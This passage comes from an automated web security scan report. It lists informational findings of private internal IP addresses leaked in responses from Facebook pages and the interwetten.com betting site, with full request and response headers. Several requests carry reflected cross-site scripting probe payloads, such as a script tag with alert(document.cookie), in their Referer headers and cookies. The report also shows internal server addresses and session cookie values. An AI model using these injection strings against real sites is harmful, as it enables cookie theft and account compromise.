Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=RTfEP; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.1.35
X-Cnection: close
Date: Mon, 16 May 2011 12:47:13 GMT
Content-Length: 35595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.34. http://www.facebook.com/WinningsCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WinningsCom

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.35. http://www.facebook.com/WinningsCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WinningsCom

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /WinningsCom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTUL_tgD2ziT00tqpXWhe; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=05pE2; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.125.37
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.36. http://www.facebook.com/crazyscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crazyscratch

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

22.37. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=115813460972&app_id=115813460972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df74bafd74%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2a4d2223%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df299f0867c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfd623e07c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df34aca9878%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=fd623e07c&origin=http%3A%2F%2Fwww.metacafe.com%2Ff4dd62dc8&relation=parent&transport=postmessage&frame=f13cc9e5f8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.138.33
X-Cnection: close
Date: Mon, 16 May 2011 12:49:43 GMT
Content-Length: 0


22.38. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=115813460972&app_id=115813460972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df21c419057025ec%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2a062fb63f73d%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1352f1a0db1c54%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3552aedd5cd8c8%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df9a75212f7bdd%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3f297822f45e2&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=P0T0X; reg_ext_ref=http%3A%2F%2Fwww.primescratchcards.com%2Findex.asp%3Fcurr%3DUSD35af5%2527%253balert(document.location)%2F%2Fd13433ff10e%26g%3D3; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; wd=1137x805

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f3552aedd5cd8c8&origin=http%3A%2F%2Fwww.metacafe.com%2Ffc9e99a80b4bc2&relation=parent&transport=postmessage&frame=f3f297822f45e2
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.132.65
X-Cnection: close
Date: Mon, 16 May 2011 12:52:03 GMT
Content-Length: 0


22.39. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/BigMoneyScratch/156518521055171

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/BigMoneyScratch/156518521055171 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTQnBh8OpqRjSzWcXKlvK; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=7uzqb; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.38.33
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 0


22.40. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/PrimeScratchCards/122783514413813

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/PrimeScratchCards/122783514413813 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/PrimeScratchCards
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTVS0-zB1xKJnbwFkgEiW; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DEbk9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.90.55
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 0


22.41. http://www.facebook.com/peoplespostcodelottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /peoplespostcodelottery

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.42. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.254.27
X-Cnection: close
Date: Mon, 16 May 2011 12:49:45 GMT
Content-Length: 9862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.43. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=P0T0X; reg_ext_ref=http%3A%2F%2Fwww.primescratchcards.com%2Findex.asp%3Fcurr%3DUSD35af5%2527%253balert(document.location)%2F%2Fd13433ff10e%26g%3D3; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; wd=1137x805

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.55.55
X-Cnection: close
Date: Mon, 16 May 2011 12:52:08 GMT
Content-Length: 9885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.44. https://www.interwetten.com/cs/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /cs/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /cs/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=cs; expires=Sun, 16-May-2021 12:42:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:07 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=93ae7ba8356b64ceadfcb45be112a0aeede56be1";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.45. https://www.interwetten.com/de/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /de/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /de/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=de; expires=Sun, 16-May-2021 12:42:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:09 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=68e2566d2888379f748c4e5bd95a38dbad94e3c7";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.46. https://www.interwetten.com/el/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /el/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /el/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=el; expires=Sun, 16-May-2021 12:42:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:09 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body><!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=aa9126912cc8ad697ed896fd8e15338360ccb69d";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.47. https://www.interwetten.com/en/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en/Default.aspx HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPool_Web01-Web07=1717899692.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 11:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:44:27 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 33754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=c0f27dd7787cee9387bb12f1b6216737e55abc4d";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.48. https://www.interwetten.com/en/casino/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/casino/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en/casino/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:04 GMT
Content-Length: 355910
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=e0d7d38c4fa774f690adf533b7612afe9db0a4f7";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.49. https://www.interwetten.com/en/games/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/games/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en/games/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 58330
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=f53a9bc1960d0ad8ba51755d86aa4b1ffc2a7df4";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.50. https://www.interwetten.com/en/online-skillgames

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/online-skillgames

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en/online-skillgames HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 75500
Vary: Accept-Encoding


